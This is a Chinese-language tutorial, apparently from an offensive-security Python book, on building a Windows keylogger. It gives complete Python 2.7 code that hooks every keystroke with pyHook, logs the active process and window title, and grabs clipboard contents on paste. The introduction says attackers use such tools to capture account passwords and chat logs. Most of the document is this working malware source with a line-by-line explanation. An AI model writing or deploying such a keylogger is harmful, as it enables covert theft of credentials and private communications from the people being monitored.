## 键盘记录器

键盘记录是本书中最古老的黑客技术之一，但至今仍在不同的层面上广泛使用。攻击者使用它是因为它能有效地捕获所需的敏感信息，如账号密码和聊天记录等。

优秀的第三方Python库PyHook'能让我们很容易地捕获所有的键盘事件。

它利用了原生的Windows函数SetwindowsHookEx，这个函数允许我们安装自定义的钩子函数，当特定的Windows事件发生时，这个钩子函数就会被调用。我们通过注册键盘事件的钩子函数就能捕获目标机器触发的所有按键消息。除此之外，我们还需要精确地知道是在哪些进程中执行了这些按键，这样我们才能确定用户名、密码和其他一些有用信息的所属对象。PyHook库为我们封装了所有的这些底层编程方法，我们只需要关注键盘记录的核心逻辑。

 

### 代码实现

 

```python
#!/usr/bin/python
# -*- encoding: utf-8 -*-
# @Time     : 12/14/2020 10:35 AM
# @Author   : ordar
# @File     : key_store.py
# @Project  : new_project
# @Python   : 2.7.18

from ctypes import *
import pythoncom
import pyHook
import win32clipboard


user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None


def get_current_process():
    """
    获取当前活动的窗口及对应的进程ID
    :return:
    """
    # 获得前台窗口句柄
    # 1. GetForeGroundwindow函数，它返回了目标桌面上当前活动窗口的句柄。
    hwnd = user32.GetForegroundWindow()
    # 获得进程id
    # 2. GetwindowThreadProcessId函数，它返回的是窗口对应的进程ID
    pid = c_ulong(0)
    user32.GetWindowThreadProcessId(hwnd, byref(pid))
    # 保存当前进程id
    process_id = "%d" % pid.value
    # 申请内存
    executable = create_string_buffer("\x00" * 512)
    # 3. 打开进程
    h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
    # 4. 利用返回的进程句柄，我们获得了进程对应的可执行文件的名字
    psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)
    # 读取窗口标题
    window_title = create_string_buffer('\x00' * 512)
    # 5. GetwindowTextA函数，我们获得了窗口标题栏中显示的文本字符
    length = user32.GetWindowTextA(hwnd, byref(window_title), 512)
    # 6. 输出进程相关信息,所有的信息通过一种醒目的方式进行了输出
    print("[ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value))

    # 关闭句柄
    kernel32.CloseHandle(hwnd)
    kernel32.CloseHandle(h_process)

```

我们仅仅是定义了一些有用的变量和一个函数，这个函数的功能是获取当前活动的窗口及对应的进程ID。在这个函数中，我们先是调用了GetForeGroundwindow函数①，它返回了目标桌面上当前活动窗口的句柄。然后，我们将句柄作为参数调用了GetwindowThreadProcessId函数②，它返回的是窗口对应的进程ID。之后，我们打开进程③，利用返回的进程句柄，我们获得了进程对应的可执行文件的名字④。通过调用GetwindowTextA函数⑤，我们获得了窗口标题栏中显示的文本字符。最后，我们将所有的信息通过一种醒目的方式进行了输出⑥，你可以直观地看到键盘记录所对应的进程和窗口。现在，我们来完成最后的工作，添加键盘记录器的核心代码。

```python
def key_store(event):
    """
    获取键盘记录函数
    :param event:
    :return:
    """
    global current_window

    # 10. 检查是否切换了窗口
    if event.WindowName != current_window:
        current_window = event.WindowName
        get_current_process()

    # 11. 检测按键是否为常规按键（非组合按键）
    if event.Ascii > 32 and event.Ascii< 127:
        print(chr(event.Ascii))
    else:
        # 12. 如果输入为[Ctrl - v]则获取剪切板内容
        if event.Key == "Lcontrol":
            # 打开剪切板
            win32clipboard.OpenClipboard()
            # 获取剪切板内容
            pasted_value = win32clipboard.GetClipboardData()
            # 关闭剪切板
            win32clipboard.CloseClipboard()
            print("[PASTE] - %s" % pasted_value)
        else:
            print("[%s]" % event.Key)

    # 直到下一个钩子事件触发
    return True


# 7. 创建和注册钩子函数管理器
k1 = pyHook.HookManager()
# 8. 将我们自定义的回调函数Keystroke与KeyDown事件进行了绑定
k1.KeyDown = key_store

# 注册键盘记录钩子，然后永久执行
# 9. 通过PyHook钩住了所有的按键事件
k1.HookKeyboard()
pythoncom.PumpMessages()

```

 

我们定义了PyHook的HookManager管理器⑦，然后将我们自定义的回调函数Keystroke与KeyDown事件进行了绑定⑧。之后，我们通过PyHook钩住了所有的按键事件⑨，然后继续消息循环。当目标按下键盘上的一个键时，我们的Keystroke函数就会被调用，它唯一的一个参数是触发这个事件的对象。在这个函数中，我们第一件要做的事是检查用户是否切换了窗口⑩，如果切换了窗口，我们需要重新获得当前窗口的名字及进程信息。然后，我们检查按键是否在可输出的ASCIⅡ码范围之内⑪，如果是的话，输出即可。

  如果按键是修饰键（如Shift、Ctrl或Alt键）或其他非标准的按键，那么我们从事件的对象中提取按键的名称。我们还检查了用户是否在进行粘贴操作⑫，如果是的话，我们提取剪切板中的内容。我们的回调函数通过返回True来允许执行消息队列中的下个hook事件（如果有的话）。下面我们来测试一下吧！

### 运行结果

我用火狐浏览器打开了百度，然后粘贴了python并搜索了。可以看到我们的键盘记录器成功获取到了Firefox进程并且获取到了按键和粘贴板内容。

![](img/f073c622-48b3-11eb-a74a-8cc6814bc10b.png)